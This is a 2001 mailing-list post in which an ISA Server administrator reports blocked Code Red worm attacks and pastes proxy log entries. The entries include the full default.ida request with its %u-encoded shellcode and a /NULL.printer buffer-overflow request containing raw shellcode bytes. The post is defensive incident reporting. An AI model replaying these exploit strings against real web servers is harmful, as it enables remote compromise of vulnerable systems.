Wow, don't know what happened to those last emails. After a few days of portscans (all successfully blocked) I finally started getting Code Red attacks. Some interesting info on the attacks. A few of the source IP's have been pretty thorough about hitting every possible combination in the ObjectName field. Regardless of their configuration all attempts have been blocked. From a few of the log entries - Intitial portion of ObjectName field ************************************************************************ *** http://www.worm.com/default.ida http://207.225.151.2/default.ida ISA external ip address http://207.225.151.1/default.ida ISA external ip address http://TANIS/default.ida an internal web server name (not sure how that was gotten. Although, I was in the process of setting up an new site and ip's (ISAs and the web servers) around the time some of the requests hit). ???? This is the log entry of a standard Code Red *************************************************** 207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy, PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET, http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u 8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, - Check out the end of the ObjectName field in this one (/NULL.printer). Not a standard Code Red but looks like they attempt a buffer overrun. ************************************************************************ *** 216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy, PALIN, -, ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ1Åj, -, 0, 80, 1182, 0, -, TCP, GET, http://ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ; ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ 1Åj/NULL.printer, -, -, 12202, 0x0, Default rule, - Michael "Never attribute to malice that which can be adequately explained by stupidity." Hanlon's Razor -----Original Message----- From: Tim Buenz [mailto:tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx] Sent: Sunday, August 05, 2001 11:25 AM To: [ISAserver.org Discussion List] Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX